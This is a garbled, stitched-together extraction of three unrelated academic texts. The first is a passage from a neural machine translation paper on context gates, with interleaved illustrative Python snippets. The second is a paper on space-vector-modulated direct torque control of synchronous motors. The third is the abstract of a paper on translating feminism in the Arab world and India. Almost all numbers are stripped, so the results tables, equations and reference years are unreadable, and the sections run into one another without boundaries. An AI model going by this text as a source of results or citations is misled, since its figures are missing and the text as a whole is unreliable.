(i.e., null-generated words). in fact this was the preliminary motivation for our approach: current attention models lack a mecha- nism to control the generation of words that do not have a strong correspondence on the source side. the model structure of nmt is quite similar to the traditional word-based smt (brown et al., ). therefore, techniques that have proven effective in smt may also be applicable to nmt. toutanova et al. ( ) extend the calculation of translation prob- abilities to include null-generated target words in word-based smt. 
these words are generated based on both the special source token null and the neigh- bouring word in the target language by a mixture model. we have simplified and generalized their ap- proach: we use context gates to dynamically control the contribution of source context. when produc- ing null-generated words, the context gate can as- sign lower weights to the source context, by which the source-side information have less influence. in a sense, the context gate relieves the need for a null state in attention. experiments . setup we carried out experiments on chinese-english translation. the training dataset consisted of . m sentence pairs extracted from ldc corpora , with . m chinese words and . m english words re- spectively. we chose the nist (mt ) dataset as the development set, and the nist (mt ), (mt ) and (mt ) datasets as the test sets. we used the case-insensitive -gram nist bleu score (papineni et al., ) as the evalua- tion metric, and sign-test (collins et al., ) for the statistical significance test. for efficient training of the neural networks, we limited the source and target vocabularies to the most frequent k words in chinese and english, covering approximately . % and . % of the data in the two languages respectively. all out-of- vocabulary words were mapped to a special token unk. we trained each model on sentences of length up to words in the training data. the word em- bedding dimension was and the size of a hid- den layer was . we trained our models until the bleu score on the development set stops improv- ing. we compared our method with representative smt and nmt models: • moses (koehn et al., ): an open source phrase-based translation system with default configuration and a -gram language model trained on the target portion of training data; • groundhog (bahdanau et al., ): an open source attention-based nmt model with de- fault setting. we have two variants that differ in the activation function used in the decoder the corpora include ldc e , ldc e , ldc e , hansards portion of ldc t , ldc t and ldc t . there is some recent progress on aggregating multiple models or enlarging the vocabulary(e.g.,, in (jean et al., )), but here we focus on the generic models. # system #parameters mt mt mt ave. moses – . . . . groundhog (vanilla) . m . . . . + context gate (both) . m . ∗ . ∗ . ∗ . groundhog (gru) . m . . . . + context gate (source) . m . ∗ . ∗ . ∗ . + context gate (target) . m . ∗ . ∗ . . + context gate (both) . m . ∗ . ∗ . ∗ . groundhog-coverage (gru) . m . . . . + context gate (both) . m . ∗ . ∗ . ∗ . table : evaluation of translation quality measured by case-insensitive bleu score. “groundhog (vanilla)” and “groundhog (gru)” denote attention-based nmt (bahdanau et al., ) and uses a sim- ple tanh function or a sophisticated gate function gru respectively as the activation function in the de- coder rnn. “groundhog-coverage” denotes attention-based nmt with a coverage mechanism to indicate whether a source word is translated or not (tu et al., ). “*” indicate statistically significant difference (p < . ) from the corresponding nmt variant. “ + context gate (both)” denotes integrating “context gate (both)” into the baseline system in row (i.e., “groundhog (vanilla)”). rnn: ) groundhog (vanilla) uses a simple tanh function as the activation function, and ) groundhog (gru) uses a sophisticated gate function gru; • groundhog-coverage (tu et al., ) : an improved attention-based nmt model with a coverage mechanism. . 
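The vocabulary truncation and UNK mapping described in the setup can be illustrated with a small self-contained sketch; the toy corpus, the cutoff value, and the helper names below are placeholders, not the paper's actual preprocessing pipeline.

```python
from collections import Counter

def build_vocab(corpus, max_size):
    """Keep only the most frequent `max_size` word types, as in the setup above."""
    counts = Counter(tok for sent in corpus for tok in sent)
    return {w for w, _ in counts.most_common(max_size)}

def replace_oov(sentence, vocab, unk="UNK"):
    """Map every out-of-vocabulary token to the special UNK symbol."""
    return [tok if tok in vocab else unk for tok in sentence]

corpus = [["the", "cat", "sat"], ["the", "dog", "ran"], ["a", "cat", "ran"]]
vocab = build_vocab(corpus, max_size=4)               # cutoff here is a toy value
print(replace_oov(["the", "giraffe", "ran"], vocab))  # ['the', 'UNK', 'ran']
```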
translation quality table shows the translation performances in terms of bleu scores. we carried out experiments on multiple nmt variants. for example, “ + context gate (both)” in row denotes integrating “con- text gate (both)” into the baseline in row (i.e., groundhog (vanilla)). for baselines, we found that the gated unit (i.e., gru, row ) indeed surpasses its vanilla counterpart (i.e., tanh, row ), which is consistent with the results in other work (chung et al., ). clearly the proposed context gates significantly improve the translation quality in all cases, although there are still considerable differ- ences among the variants: parameters context gates introduce a few new parameters. the newly introduced parameters in- clude wz ∈ rn×m, uz ∈ rn×n, cz ∈ rn×n ′ in https://github.com/tuzhaopeng/ nmt-coverage. equation . in this work, the dimensionality of the decoding state is n = , the dimensionality of the word embedding is m = , and the dimen- sionality of context representation is n′ = . the context gates only introduce . m additional param- eters, which is quite small compared to the number of parameters in the existing models (e.g., . m in the “groundhog (gru)”). over groundhog (vanilla) we first carried out experiments on a simple decoder without gating function (rows and ), to better estimate the im- pact of context gates. as shown in table , the proposed context gate significantly improved trans- lation performance by . bleu points on average. it is worth emphasizing that context gate even out- performs a more sophisticated gating function (i.e., gru in row ). this is very encouraging, since our model only has a single gate with half of the param- eters (i.e., . m versus . m) and less computations (i.e., half the matrix computations to update the de- coding state ). we only need to calculate the context gate once via equa- tion and then apply it when updating the decoding state. in contrast, gru requires the calculation of an update gate, a re- set gate, a proposed updated decoding state and an interpolation between the previous state and the proposed state. please refer to (cho et al., ) for more details. groundhog vs. groundhog+context gate adequacy fluency < = > < = > evaluator . % . % . % . % . % . % evaluator . % . % . % . % . % . % table : subjective evaluation of translation adequacy and fluency. over groundhog (gru) we then investigated the effect of the context gates on a standard nmt with gru as the decoding activation function (rows - ). several observations can be made. first, con- text gates also boost performance beyond the gru in all cases, demonstrating our claim that context gates are complementary to the reset and update gates in gru. second, jointly controlling the infor- mation from both translation contexts consistently outperforms its single-side counterparts, indicating that a direct interaction between input signals from the source and target contexts is useful for nmt models. over groundhog-coverage (gru) we finally tested on a stronger baseline, which employs a cov- erage mechanism to indicate whether or not a source word has already been translated (tu et al., ). our context gate still achieves a significant improve- ment of . bleu points on average, reconfirm- ing our claim that the context gate is complemen- tary to the improved attention model that produces a better source context representation. finally, our best model (row ) outperforms the smt baseline system using the same data (row ) by . bleu points. 
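The parameter overhead discussed above is easy to reproduce: a context gate adds exactly the three matrices Wz, Uz, and Cz. The sketch below counts them for illustrative dimensions only, since the paper's exact values of n, m, and n' were lost in extraction; it is not a claim about the reported figure.

```python
def context_gate_extra_params(n, m, n_src):
    """Parameters added by one context gate: Wz (n x m) + Uz (n x n) + Cz (n x n')."""
    return n * m + n * n + n * n_src

# illustrative dimensions only; the paper's exact values were lost in extraction
n, m, n_src = 1000, 500, 2000
print(f"{context_gate_extra_params(n, m, n_src) / 1e6:.1f}M extra parameters")  # 3.5M here
```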
from here on, we refer to “groundhog” for “groundhog (gru)”, and “context gate” for “context gate (both)” if not otherwise stated. subjective evaluation we also conducted a sub- jective evaluation of the benefit of incorporating context gates. two human evaluators were asked to compare the translations of source sentences randomly sampled from the test sets without know- ing which system produced each translation. table shows the results of subjective evaluation. the two human evaluators made similar judgments: in ade- quacy, around % of groundhog translations are worse, % are equal, and % are better; while in system saer aer groundhog . . + context gate . . groundhog-coverage . . + context gate . . table : evaluation of alignment quality. the lower the score, the better the alignment quality. fluency, around % are worse, % are equal, and % are better. . alignment quality table lists the alignment performances. follow- ing tu et al. ( ), we used the alignment error rate (aer) (och and ney, ) and its variant saer to measure the alignment quality: saer = − |ma ×ms|+ |ma ×mp ||ma|+ |ms| where a is a candidate alignment, and s and p are the sets of sure and possible links in the refer- ence alignment respectively (s ⊆ p ). m denotes the alignment matrix, and for both ms and mp we assign the elements that correspond to the existing links in s and p probability and the other elements probability . in this way, we are able to better eval- uate the quality of the soft alignments produced by attention-based nmt. we find that context gates do not improve align- ment quality when used alone. when combined with coverage mechanism, however, it produces bet- ter alignments, especially one-to-one alignments by selecting the source word with the highest align- ment probability per target word (i.e., aer score). one possible reason is that better estimated decod- ing states (from the context gate) and coverage in- formation help to produce more concentrated align- ments, as shown in figure . (a) groundhog-coverage (saer= . ) (b) + context gate (saer= . ) figure : example alignments. incorporating context gate produces more concentrated alignments. # system gate inputs mt mt mt ave. groundhog – . . . . + gating scalar ti− . ∗ . . . + context gate (source) ti− . ∗ . . ∗ . + context gate (both) ti− . ∗ . ∗ . ∗ . ti− , si . ∗ . ∗ . ∗ . ti− , si, yi− . ∗ . ∗ . ∗ . table : analysis of the model architectures measured in bleu scores. “gating scalar” denotes the model proposed by (xu et al., ) in the image caption generation task, which looks at only the previous decod- ing state ti− and scales the whole source context si at the vector-level. to investigate the effect of each component, we list the results of context gate variants with different inputs (e.g., the previously generated word yi− ). “*” indicates statistically significant difference (p < . ) from “groundhog”. . architecture analysis table shows a detailed analysis of architecture components measured in bleu scores. several ob- servations can be made: • operation granularity (rows and ): element-wise multiplication (i.e., context gate (source)) outperforms the vector-level scalar (i.e., gating scalar), indicating that precise control of each element in the context vector boosts translation performance. 
• gate strategy (rows and ): when only fed with the previous decoding state ti− , context gate (both) consistently outperforms context gate (source), showing that jointly controlling information from both source and target sides is important for judging the importance of the contexts. • peephole connections (rows and ): peep- holes, by which the source context si controls the gate, play an important role in the context gate, which improves the performance by . in bleu score. • previously generated word (rows and ): previously generated word yi− provides a more explicit signal for the gate to judge the importance of contexts, leading to a further im- provement on translation performance. . effects on long sentences we follow bahdanau et al. ( ) and group sen- tences of similar lengths together. figure shows figure : performance of translations on the test set with respect to the lengths of the source sentences. context gate improves performance by alleviating in-adequate translations on long sentences. the bleu score and the averaged length of trans- lations for each group. groundhog performs very well on short source sentences, but degrades on long source sentences (i.e., > ), which may be due to the fact that source context is not fully interpreted. context gates can alleviate this problem by balanc- ing the source and target contexts, and thus improve decoder performance on long sentences. in fact, in- corporating context gates boost translation perfor- mance on all source sentence groups. we confirm that context gate weight zi correlates well with translation performance. in other words, translations that contain higher zi (i.e., source con- text contributes more than target context) at many time steps are better in translation performance. we used the mean of the sequence z , . . . ,zi, . . . ,zi as the gate weight of each sentence. we calculated the pearson correlation between the sentence-level gate weight and the corresponding improvement on translation performance (i.e., bleu, adequacy, and fluency scores), as shown in table . we observed that context gate weight is positively correlated with translation performance improvement and that the correlation is higher on long sentences. as an example, consider this source sentence from the test set: we use the average of correlations on subjective evaluation metrics (i.e., adequacy and fluency) by two evaluators. length bleu adequacy fluency < . . . > . . . table : correlation between context gate weight and improvement of translation performance. “length” denotes the length of source sentence. “bleu”, “adequacy”, and “fluency” denotes different metrics measuring the translation perfor- mance improvement of using context gates. zhōuliù zhèngshı̀ yı̄ngguó mı́nzhòng dào chāoshı̀ cǎigòu de gāofēng shı́kè, dāngshı́ jiā chāoshı̀ de guānbı̀ lı̀ng yı̄ngguó zhè jiā zuı̀ dà de liánsuǒ chāoshı̀ sǔnshı̄ shùbǎiwàn yı̄ngbàng de xiāoshòu shōurù . groundhog translates it into: twenty - six london supermarkets were closed at a peak hour of the british pop- ulation in the same period of time . which almost misses all the information of the source sentence. integrating context gates improves the translation adequacy: this is exactly the peak days british peo- ple buying the supermarket . the closure of the supermarkets of the super- markets that the largest chain supermar- ket in england lost several million pounds of sales income . 
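Returning to the correlation analysis above (the running example resumes below), the sentence-level gate weight and its Pearson correlation with quality improvements can be computed as in this sketch. The per-sentence weights and BLEU gains shown are hypothetical values for illustration, not the paper's data.

```python
import numpy as np

def sentence_gate_weight(z_steps):
    """Mean gate activation over all decoding steps of one sentence,
    used above as the sentence-level gate weight."""
    return float(np.mean([np.mean(z) for z in z_steps]))

def pearson(x, y):
    """Pearson correlation between sentence-level gate weights and quality gains."""
    return float(np.corrcoef(np.asarray(x, float), np.asarray(y, float))[0, 1])

# hypothetical per-sentence gate weights and BLEU improvements (not the paper's data)
gate_weights = [0.42, 0.55, 0.61, 0.48, 0.70]
bleu_gains   = [0.5, 1.2, 1.8, 0.9, 2.4]
print(round(pearson(gate_weights, bleu_gains), 3))
```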
coverage mechanisms further improve the transla- tion by rectifying over-translation (e.g., “of the supermarkets”) and under-translation (e.g., “satur- day” and “at that time”): saturday is the peak season of british peo- ple ’s purchases of the supermarket . at that time , the closure of supermarkets made the biggest supermarket of britain lose millions of pounds of sales income . conclusion we find that source and target contexts in nmt are highly correlated to translation adequacy and flu- ency, respectively. based on this observation, we propose using context gates in nmt to dynamically control the contributions from the source and target contexts in the generation of a target sentence, to enhance the adequacy of nmt. by providing nmt the ability to choose the appropriate amount of in- formation from the source and target contexts, one can alleviate many translation problems from which nmt suffers. experimental results show that nmt with context gates achieves consistent and signifi- cant improvements in translation quality over differ- ent nmt models. context gates are in principle applicable to all sequence-to-sequence learning tasks in which infor- mation from the source sequence is transformed to the target sequence (corresponding to adequacy) and the target sequence is generated (corresponding to fluency). in the future, we will investigate the ef- fectiveness of context gates to other tasks, such as dialogue and summarization. it is also necessary to validate the effectiveness of our approach on more language pairs and other nmt architectures (e.g., using lstm as well as gru, or multiple layers). acknowledgement this work is supported by china national project cb . yang liu is supported by the national natural science foundation of china (no. ) and the program ( aa ). we thank action editor chris quirk and three anonymous reviewers for their in- sightful comments. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learning to align and translate. iclr . peter e. brown, stephen a. della pietra, vincent j. della pietra, and robert l. mercer. . the mathematics of statistical machine translation: parameter estima- tion. computational linguistics, ( ): – . kyunghyun cho, bart van merrienboer, caglar gulcehre, fethi bougares, holger schwenk, and yoshua ben- gio. . learning phrase representations using rnn encoder-decoder for statistical machine translation. in emnlp . junyoung chung, caglar gulcehre, kyunghyun cho, and yoshua bengio. . empirical evaluation of gated recurrent neural networks on sequence model- ing. arxiv. michael collins, philipp koehn, and ivona kučerová. . clause restructuring for statistical machine translation. in acl . felix a gers and jürgen schmidhuber. . recurrent nets that time and count. in ijcnn . ieee. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation. sébastien jean, kyunghyun cho, roland memisevic, and yoshua bengio. . on using very large target vo- cabulary for neural machine translation. in acl . yangfeng ji, trevor cohn, lingpeng kong, chris dyer, and jacob eisenstein. . document context lan- guage models. in iclr . nal kalchbrenner and phil blunsom. . recurrent continuous translation models. in emnlp . philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondrej bojar, alexandra con- stantin, and evan herbst. . 
moses: open source toolkit for statistical machine translation. in acl . minh-thang luong, hieu pham, and christopher d. manning. . effective approaches to attention- based neural machine translation. in emnlp . tomas mikolov and geoffrey zweig. . context de- pendent recurrent neural network language model. in slt . franz j. och and hermann ney. . a systematic comparison of various statistical alignment models. computational linguistics, ( ): – . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic eval- uation of machine translation. in acl . matthew snover, nitin madnani, bonnie j dorr, and richard schwartz. . fluency, adequacy, or hter?: exploring different human judgments with a tunable mt metric. in proceedings of the fourth workshop on statistical machine translation, pages – . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in nips . kristina toutanova, h. tolga ilhan, and christopher d. manning. . extensions to hmm-based statistical word alignment models. in emnlp . zhaopeng tu, zhengdong lu, yang liu, xiaohua liu, and hang li. . modeling coverage for neural machine translation. in acl . tian wang and kyunghyun cho. . larger-context language modelling with recurrent neural network. in acl . kelvin xu, jimmy ba, ryan kiros, kyunghyun cho, aaron courville, ruslan salakhutdinov, richard zemel, and yoshua bengio. . show, attend and tell: neural image caption generation with visual at- tention. in icml . international journal of advanced network monitoring and controls volume , no. , the research of direct torque control based on space vector modulation su xiaohui , chen guodong and xu shuping school of computer science and engineering, xi’an technological university, china email: suxh @ .com abstract. in order to solve the conventional direct torque control contradiction between the dynamic and static performance ,a permanent magnet synchronous motor system direct torque control architecture is proposed based on space vector modulation strategy . in this method flux and torque are controlled through stator voltage components in stator fluxlinkage coordinate axes and space vector modulation is used to control inverters.the simulation verifies that svm-dtcis capable of effectively improving the steady state performance and keeping the excellent dynamic performance of theconventional dtc system simultaneously and remain the switching frequency constant. keywords: simulation, direct torque control, space vector modulation. . 
introduction direct torque control (dtc) has been widely used in the field of control of permanent magnet synchronous motor (pmsm), because it has the advantages of simple structure and fast dynamic response of the torque, which has been paid more and more attention in recent years [ - ].conventional direct torque control is based on the torque, flux hysteresis controller output and a ° stator flux linkage angle based on the signal, according to certain rules from the prefabricated switch table select the appropriate space voltage vector on the motortorque, flux linkage for bang-bang control [ ].however, according to this way of selecting the voltage vector can not meet the system of torque and flux linkage of the double request, will have a larger torque and flux ripple [ ].in addition, the conventional dtc method can cause the output of the hysteresis controller and the position of the stator flux linkage signal to be constant over multiple sampling periods, resulting in the same switch state of the inverter during these sampling periods, and thus the switching frequency of the system is changednot constant, the capacity of the power device can not be fully utilized [ ].space vector modulation (svm) is used to obtain the desired arbitrary voltage vector by combining adjacent effective voltage vector and zero- voltage vector in one sampling period, and the voltage vector is linearly adjustable [ ]. . space vector modulation algorithm there are eight switching states for three-phase voltage source inverters, corresponding to six active voltage vectors: u ( ), u ( ), u ( ), u ( ), u ( ), u ( ) and two zero-voltage vectors u ( ), u ( ). space vector modulation is applied to the motor is based on three-phase symmetrical sinusoidal voltage supply ac motor generated by the ideal circular flux trajectory as the the research of direct torque control based on space vector modulation base, through the eight basic space voltage vector to the equivalent reference voltage vector so that the actual motor the air-gap trajectory approaches the ideal circle. as shown in fig. , in the coordinate system, the first sector is used as an example to synthesize the reference vector with two adjacent voltage vectors u , u and zero vectors u (u and u ). according to the volt-second balance principle: * s st t t t+ + =u u u u ( ) where, t , t , respectively u , u role of time, t is zero vector of time, t for the pwm cycle. the meaning of formula ( ) is that the integral effect produced by the vector in t time is the same as the integration effect of u , u and zero vector u . figure. space voltage vector and sector ( ) u , u and in axis decomposition obtained:          −−= = −= ) ( tttt u u t t uu u t t s dc s dc s β βα ( ) the amplitude of the fundamental voltage of the output voltage increases linearly with time, and the time t of the zero vector u decreases gradually, but the following relationship should be satisfied:    ≥ ≤+ t ttt s ( ) similarly, in the remaining five sectors, the basic space voltage vector will change with the region of the corresponding changes. this allows svm technology to synthesize any required space voltage vectors. space vector modulation is to use a certain frequency ( / ts) and amplitude ( ts / ) of the equivalent time triangular wave to modulate a, b, c three-phase switching time tcm , tcm , tcm ,that is, the modulation signal. from the basic modulation principle of svm, the maximum linear range of svm is the inscribed circle shown in fig. 
, that is, the space vector modulation in the inscribed circle is linear modulation, while the over-inscribed circle is overmodulation . the following simulation and international journal of advanced network monitoring and controls volume , no. , experimental analysis and comparison of different reference voltage vector in the case, svm modulation signal and output line voltage waveform and the relationship between. . dynamic control of stator flux linkage figure depicts the relationship between the stator flux linkage and the space voltage vector in the motor operation and the relationship between the stator flux in a single sampling period t dynamic control process stator flux. figure. flux linkage diagram in fig. , the phase angle sγ of the stator flux vector sø at the present moment can be estimated by the flux estimator in the stator two-phase stationary coordinate system αβ ,if the control system gives the reference flux linkage * sø with the phase angle * sγ , the stator flux linkage δ∆ angle ahead of the current time, if the actual flux vector arrives at the reference flux linkage at the next sampling time, a space voltage vector * su as shown in the figure should be applied in the time period of the sampling period t , the reason for this is that the magnitude and phase angle of the applied space voltage vector u * can be calculated from equations ( ) ~ ( ) by moving the end points of the flux vector in the direction of the applied space voltage vector. * * * cos( ) cos cos( ) coss s s s s s s s s s s s s u r i t tα α γ δ γ γ δ γ+ ∆ − + ∆ − = + ≈ øøøø ( ) * * * sin( ) sin sin( ) sins s s s s s s s s s s s s u r i t tβ β γ δ γ γ δ γ+ ∆ − + ∆ − = + ≈ øøøø ( ) * * * s s su uα β= +u ( ) * * *arctan( / )s s su uβ αϕ = ( ) where *su α and * su β are the components of the reference voltage vector * su in the two-phase stationary coordinate system αβ , respectively, * su and *sϕ , respectivelyis the amplitude and phase angle of * su . the stator flux vector magnitude and phase angle, torque can be calculated by the following formula: the research of direct torque control based on space vector modulation     −= −= ∫ ∫ dtiru dtiru ssss ssss )( )( βββ ααα ψ ψ ( ) s s sα βψ ψ ψ= + ( ) )/arctan( αβ ψψγ sss = ( ) )( αββα ψψ sssspe iint −= ( ) the subscripts α and β are the components of each physical quantity on the αβ -axis of the stator two-phase stationary coordinate system. . direct torque control of space vector modulation the structure diagram of the direct torque control system (svm-dtc) of permanent magnet synchronous motor based on space vector modulation is shown in fig. , where the reference flux calculation model element and the space voltage vector modulation element svm replaces the flux linkage in a conventional dtcand a torque hysteresis controller and switch table. figure. svm-dtc block diagram of the structure in fig. 
, the difference between the reference angular velocity * sω and the feedback angular velocity ω is output to the reference torque command *et via a pi regulator.as the steady-state stator flux rotation speed and the rotor speed of rotation is the same, that is, synchronous speed ω , and when the reference torque or load torque in the dynamic process of mutation, the two speeds will be significantly inconsistent, the stator the flux rotation speed is significantly faster than the rotor rotation speed, there is a difference between the two rotational speed difference sω∆ .thus, the difference between the reference torque * et and the estimated torque et can be output by a pi regulator, which is the stator flux rotational speed increment sω∆ ,to reflect the dynamic change of the torque in real time.thus, the total rotational speed * sω of the flux linkage in one sampling period can be determined by the steady-state rotation speed ω and the rate of changeof the rotational speed difference sω∆ , that is, the system should be in dtd /θ *ω ω + - + as bs cs θ encoder pmsm vsisvm fl ux and torque esti mate e t * et - dcu pi flux model reference * sψ sγ ω  + - sψ * sψ st sψ∆  * supi + + sω∆ *sω abci international journal of advanced network monitoring and controls volume , no. , the next sampling period given the flux reference speed.after obtaining the total flux rotation speed * sω , the reference flux vector * sø given in the next sampling period can be obtained by referring to the flux linkage calculation model.the reference flux vector * sø and the estimated flux vector sø of the current time can be calculated in the next sampling cycle should be applied to the space voltage vector * su , space voltage vector * su and then through the space voltage vector modulation unit svm to generate pwm pulse signal as , bs and cs , the final control voltage source inverter vsi drive permanent magnet synchronous motor.this new structure has the following advantages: pi regulator parameter adjustment is easy, and will not make the entire control system is running difficult.the product δ∆ of the stator flux angle at the next time can be obtained by multiplying the flux rotation speed * sω and the sampling period t . therefore, it is possible to adjust t todetermine δ∆ , which is easy to implement in the actual system. . simulation analysis the svm-dtc control of permanent magnet synchronous motor (pmsm) based on the above- mentioned principle is established by matlab / simulink simulation softwaresystem model.the simulation motor parameters are: un = v; np = ; rs = . ohms; ld = . mh; lq = . mh;f = . wb.specific simulation conditions are set to: no-load start, the initial speed r / min, . s step to r / min,the load was applied to the n • m at . s. 
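The computations described in the preceding sections (flux and torque estimation, the speed and torque PI loops, the reference voltage vector, and the sector-1 dwell times from the volt-second balance) can be collected into one hedged sketch of a single SVM-DTC control period. The paper's model was built in MATLAB/Simulink; the Python sketch here only illustrates the per-period arithmetic. All gains, motor parameters, and measured values below are placeholders rather than the paper's simulation settings, the 3/2 factor in the torque estimate and the pure-integrator flux estimator are standard textbook conventions assumed here, and sector selection is omitted (the dwell-time function assumes the reference vector lies in sector 1).

```python
import numpy as np

class PI:
    """Simple discrete PI regulator with output clamping (gains are illustrative)."""
    def __init__(self, kp, ki, Ts, limit):
        self.kp, self.ki, self.Ts, self.limit = kp, ki, Ts, limit
        self.integ = 0.0

    def step(self, err):
        self.integ = float(np.clip(self.integ + self.ki * err * self.Ts,
                                    -self.limit, self.limit))
        return float(np.clip(self.kp * err + self.integ, -self.limit, self.limit))

def flux_torque_estimate(psi, u, i, Rs, n_p, Ts):
    """Discrete stator flux/torque estimator in the alpha-beta frame:
    psi += (u - Rs*i)*Ts,  Te = 1.5*n_p*(psi_a*i_b - psi_b*i_a).
    A pure integrator is used here; practical estimators add drift compensation."""
    psi = psi + (u - Rs * i) * Ts
    Te = 1.5 * n_p * (psi[0] * i[1] - psi[1] * i[0])
    return psi, np.hypot(psi[0], psi[1]), np.arctan2(psi[1], psi[0]), Te

def reference_voltage(psi, psi_ref, gamma, d_delta, i, Rs, Ts):
    """Voltage vector that moves the flux tip onto the reference flux in one period:
    u* = (psi_ref*[cos, sin](gamma + d_delta) - psi)/Ts + Rs*i."""
    target = psi_ref * np.array([np.cos(gamma + d_delta), np.sin(gamma + d_delta)])
    return (target - psi) / Ts + Rs * i

def svm_dwell_times(u_ref, Udc, Ts):
    """Sector-1 dwell times from the volt-second balance T1*u1 + T2*u2 + T0*u0 = Ts*u*,
    assuming |u1| = |u2| = 2*Udc/3 with u1 on the alpha axis and u2 at 60 degrees."""
    ua, ub = u_ref
    T2 = np.sqrt(3.0) * Ts * ub / Udc
    T1 = np.sqrt(3.0) * Ts * (np.sqrt(3.0) * ua - ub) / (2.0 * Udc)
    if T1 + T2 > Ts:                       # overmodulation: pull back to the linear range
        k = Ts / (T1 + T2)
        T1, T2 = k * T1, k * T2
    return T1, T2, Ts - T1 - T2

# one control period (all numeric values below are placeholders, not the paper's)
Ts, Rs, n_p, Udc, psi_ref = 1e-4, 2.875, 4, 310.0, 0.31
speed_pi = PI(kp=0.5, ki=20.0, Ts=Ts, limit=10.0)      # speed error -> torque reference
torque_pi = PI(kp=50.0, ki=500.0, Ts=Ts, limit=500.0)  # torque error -> flux-speed increment

psi = np.array([0.30, 0.0])
u_meas, i_meas = np.array([10.0, 5.0]), np.array([1.0, 0.5])
w_ref, w = 100.0, 95.0

psi, psi_mag, gamma, Te = flux_torque_estimate(psi, u_meas, i_meas, Rs, n_p, Ts)
Te_ref = speed_pi.step(w_ref - w)
d_delta = (w + torque_pi.step(Te_ref - Te)) * Ts        # flux-angle advance for this period
u_star = reference_voltage(psi, psi_ref, gamma, d_delta, i_meas, Rs, Ts)
print(svm_dwell_times(u_star, Udc, Ts))
```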
figures to show the performance comparison of the conventional dtc and svm-dtc simulation results, respectively.as can be seen from the figure,the response time of this control system is very short, almost no overshoot, which is the direct torque control of the outstanding advantages.from the torquewaveform, the control mode of dynamic response is very fast, steady-state svm-dtc torque fluctuations more stable, which canit is seen from the current waveform that the current waveform of the svm-dtc is closer to the sine wave than the conventional dtc current waveform.these differences is that the conventional dtc can only be controlled by selecting six basic active space voltage vectors and a hysteresis controller and svm-dtc can use svm to arbitrarily linearly combine the required space voltage vector to by real-time sampling calculation can be more precise control of the stator flux linkage. (a) conventional dtc velocity response curve (b) svm-dtc velocity response curve figure . two kinds of control speed response curve the research of direct torque control based on space vector modulation (a) conventional dtc torque response curve (b)svm-dtc torque response curve figure. two kinds of control torque response curve (a)conventional dtc phase current curves (b)svm-dtc phase current curve figure. two kinds of control phase current curve torque figure for the svm-dtc control process of the motor torque angle δ waveform of the change, we can see that the torque angle is electromagnetic torque changes consistent.in most steady- state processes, the torque angle δ is in the vicinity of a fixed value to do a small wave and the torque angle also changes rapidly in the dynamic process of rapid torque change. figure. torque angle δ curve international journal of advanced network monitoring and controls volume , no. , . conclusion in order to solve the contradiction between dynamic and static performance of conventional direct torque control, that is, the contradiction between torque, fast response of flux linkage and torque, and large steady-state pulsation of flux linkage, this paper proposes a space vector based on space vector (pmsm) direct torque control (svm-dtc), the principle and implementation of the scheme are discussed in detail. it is pointed out that the conventional dtc can only control the motor torque and flux linkage with a limited basic voltage vector, but none of the basic space voltage vectors can completely compensate the flux and torque errors in the system at the same time. vector modulation (svm) is a promising solution. secondly, the basic principle of svm is expounded briefly. the svm algorithm under different reference voltage vector input is analyzed, simulated and experimented. the svm algorithm and its application are discussed in detail. implementation has a clearer understanding. finally, the svm-dtc is discussed in detail, including the structure of the control system, the dynamic control process of the stator flux vector, the method of flux and torque estimation and the calculation model of the reference flux, etc. theoretically, and the best compensation principle of flux error. finally, the realization of svm-dtc is studied, and compared with conventional dtc, the correctness of the control strategy is verified. simulation results show that compared with conventional direct torque control, svm-dtc has the advantages of faster dynamic response of conventional dtc and more stable steady-state operation while keeping the switching frequency of power devices constant. 
because svm-dtc has low hardware requirements and good control performance, it can effectively solve the contradiction between dynamic and static performance of conventional dtc, so it has good application prospects. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the project funds in shaanxi province department of education ( jf ) and the project funds in shanxi province department of science industrial projects( gy ). references [ ] zhang wei, michael s,branicky, stephen m, phillips,stability of networked control systems, ieee control systems magazine february , ( ): - . [ ] goodwin c, juan carlos aguero,ariefeuer, state estima tion for systems having random measurement delays usingerrors in variables, the th triennial world congress barcelona,spain, . [ ] lee kyung chang,lee suk, remote controller design of networked control system using genetic algorithm, isie ,pusan,korea in ieee, : - . [ ] almutairinaif b,chow moyuen, pi parameterization using adaptive fuzzy modulation (afm) for networked control systems - part i : partial adaptation [j],ieee proceedings of iecon ,sevilla,spain, . - . the research of direct torque control based on space vector modulation [ ]huang j q , lew is fl, liu k a, neural predictive control for telerobotswith time delay [j]. journal of intelligent and robotic system s, , : - . [ ]lian fengli analysis, design, modeling,and control of networked control systems, ph.d. thesis,the university of michigan, . [ ] huang j q , lew is fl, liu k a, neural predictive control for telerobotswith time delay [j]. journal of intelligent and robotic system s, , : - . about the author su xiaohui, ( - ), male (the han nationality), shaanxi province, working in xi’an technological university, vicect professor, the research area is computer control. correspondence address (school of computer science and engineering , xi’an technological university) postal code: tel: email: suxh @ .com untitled o p e n a c c e s s research article instigating social change: translating feminism in the arab world and india alanoud alsharekh* abstract the most common accusation levelled at those working in gender studies in the arab world is tied to the fact that they are commonly viewed as dealing with a “western” concept; corrupting the cultural and traditional value system of the arabo-islamic heritage of the region. linguistic resistance to this field is an obvious impediment to its progression, with a range of dissatisfactory and often conflicted terminology meant to distance the language from the very concept of feminism: nassawiyar unthawiya, both alien-sounding and cumbersome. engaging in the act of translation in a linguistic and cultural vacuum means that the translator becomes an active agent in developing and shaping concepts associated with feminism, while simultaneously conveying the social and moral values that are associated with the quest for female empowerment in the west. this same burden of shaping concepts and creating them while actively engaging in the act of translation was faced by indian translators of feminism and those working in the field of gender studies beforehand. this paper will attempt to look at the experience of the importance of translation in the field of gender studies in the developing world and the similar hurdles and triumphs that were experienced by those working in the field in india and in the arab middle east. keywords: comparative feminism, translation, india, arab cite this article as: alsharekh a. 
